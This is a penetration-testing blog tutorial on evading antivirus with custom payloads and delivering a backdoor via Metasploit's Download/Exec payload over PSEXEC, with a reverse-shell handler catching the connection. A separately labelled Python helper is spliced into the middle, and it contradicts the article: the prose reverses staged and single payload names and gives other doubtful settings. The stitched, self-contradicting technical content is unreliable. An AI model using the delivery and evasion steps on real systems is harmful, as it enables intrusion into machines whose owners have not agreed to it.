Payload Customization with Metasploit
June 21, 2016
Why would we need custom payloads? Likely in situations where we launched Metasploit but no session was created, or it seems like the antivirus software flagged the payload. As a penetration tester, you have to overcome that, and antivirus software always seems to be a hurdle. The best possible way to avoid antivirus software is to use custom payloads. Create your own custom payload, and then you won't have to worry about an antivirus signature catching it! It gives you the flexibility to go after any target.

Note: there are tools and articles to help you do this, including the Veil Framework. I'll cover the Veil Framework in this custom payload series. Let's begin...

You've built your custom payload, so what's next? What's the procedure for making it operational? What about delivery and execution on the victim's machine?

Start with the Download/Exec payload available in Metasploit. It's a tremendous option for delivering a custom payload to a target. You can even use it with memory corruption exploits, i.e. buffer overflows, and with authenticated attacks like PSEXEC. With this Metasploit payload, you can use your custom payload with Meterpreter.

You need three things to use the Download/Exec payload:
- Set up a website from which the victim can download your custom Trojan/backdoor.
- Set up a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
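Step 2 of that list only works if the handler's payload name matches what the custom backdoor actually does when it connects back, and Metasploit encodes that in the name: a slash before the connection method (windows/shell/reverse_tcp) is a staged payload, whose handler will push a stage to a stager once something connects, while an underscore (windows/shell_reverse_tcp) is a single, self-contained payload, whose handler just expects the finished session. The Python helper below is an added example, not code from this write-up or from the Metasploit project; it parses a payload name under that convention and reports whether a handler set to it fits a hand-written backdoor that simply connects back with a command prompt or Meterpreter. The function names, the architecture list and the exclusion of cmd/* script payloads are this example's own choices.

```python
"""Classify a Metasploit payload name as staged or single and check whether a
handler set to that name matches what a hand-written backdoor will send.

Added example (not from the article or the Metasploit project). It follows
Metasploit's naming convention:
  <platform>[/<arch>]/<payload>/<stager>     e.g. windows/shell/reverse_tcp  -> staged
  <platform>[/<arch>]/<payload>_<connection> e.g. windows/shell_reverse_tcp  -> single
The helper names, the architecture list and the restriction to native
(non-cmd/*) payloads are this example's own simplifications.
"""

# Constructed list of architecture segments that may follow the platform.
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc", "sparc"}
# Stager segments name the connection method and start with one of these.
STAGER_PREFIXES = ("reverse_", "bind_")


def parse_payload_name(name):
    """Return a dict describing the payload name, or raise ValueError."""
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a platform/payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    if platform == "cmd":
        # cmd/* script payloads use a different layout; not modelled here.
        raise ValueError(f"script payloads are outside this example's scope: {name!r}")
    arch = rest.pop(0) if rest and rest[0] in KNOWN_ARCHES else None
    if not rest:
        raise ValueError(f"missing payload segment: {name!r}")
    last = rest[-1]
    if len(rest) >= 2 and last.startswith(STAGER_PREFIXES):
        # Slash before the connection method: staged. The handler sends the
        # real payload (the stage) only after a stager connects and asks for it.
        return {"platform": platform, "arch": arch, "payload": "/".join(rest[:-1]),
                "connection": last, "staged": True}
    if len(rest) == 1:
        # Underscore (or no connection part at all): single, self-contained payload.
        payload, _, connection = last.partition("_")
        return {"platform": platform, "arch": arch, "payload": payload,
                "connection": connection or None, "staged": False}
    raise ValueError(f"unrecognised payload layout: {name!r}")


def handler_expects(name):
    """What a multi/handler set to this payload will do when something connects."""
    return "stager" if parse_payload_name(name)["staged"] else "complete payload"


def check_handler_for_custom_backdoor(handler_payload, backdoor_provides):
    """List mismatches between a handler payload and a hand-written backdoor that
    simply connects back and offers `backdoor_provides` ('shell' or 'meterpreter').
    An empty list means the pairing is consistent."""
    info = parse_payload_name(handler_payload)
    problems = []
    if info["staged"]:
        arch_part = f"{info['arch']}/" if info["arch"] else ""
        single_form = f"{info['platform']}/{arch_part}{info['payload']}_{info['connection']}"
        problems.append(
            f"{handler_payload} is staged: the handler will try to push a stage to a "
            f"stager, but a custom backdoor that just connects back has no stager; "
            f"the single form is {single_form}")
    if info["payload"] != backdoor_provides:
        problems.append(
            f"{handler_payload} expects a {info['payload']} session but the backdoor "
            f"provides {backdoor_provides}")
    return problems


if __name__ == "__main__":
    # Constructed sample names, including the Download/Exec single payload.
    for name in ("windows/shell/reverse_tcp", "windows/shell_reverse_tcp",
                 "windows/x64/meterpreter/reverse_https", "windows/download_exec"):
        info = parse_payload_name(name)
        print(f"{name:42} staged={str(info['staged']):5} handler expects: {handler_expects(name)}")
    for problem in check_handler_for_custom_backdoor("windows/shell/reverse_tcp", "shell"):
        print("mismatch:", problem)
```

Run it directly to see the sample names classified, or call check_handler_for_custom_backdoor with the payload you intend to set on the handler and what your backdoor actually provides; every string it returns is a mismatch that would leave the handler waiting for a stager while the backdoor sits at a prompt nobody is reading.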
2 - Set up a Metasploit handler

If your custom payload provides Meterpreter, you would type:

“set payload windows/meterpreter/reverse_tcp”

If it is a command prompt, then you would type:

“set payload windows/shell/reverse_tcp”

My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”

This “single” payload doesn't use a stager and expects a connection from a shell. Do not confuse it with “windows/shell_reverse_tcp”, which expects a connection from a stager, not a shell.

For a better understanding, check my write-ups on:
https://www.cybrary.it/0p3n/metasploit-advanced/
https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/
https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/

Let's continue... Set LHOST to 127.0.0.1 and set LPORT to 80, as my payload is set to send a command prompt to port 80. Start the multi-handler as a background task: the “-j” option starts the multi-handler as a “job” that runs in the background.

3 - Exploit and deliver the payload

With your handler in the background waiting to receive a connection, you're ready to exploit the target. I'll use PSEXEC. First, I select “windows/smb/psexec” and set it up with the correct user and password for the target. Then I set my payload: “set PAYLOAD download/exec”

The options are simple. Set the URL to point to the custom payload on your web server from step 1. You can change the name of the file that will be saved on the target if you like. Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler.

Please note: for those who want a greater understanding of PSEXEC, I'll cover it in my next write-up.

Stay Linked!!!

Ali Tabish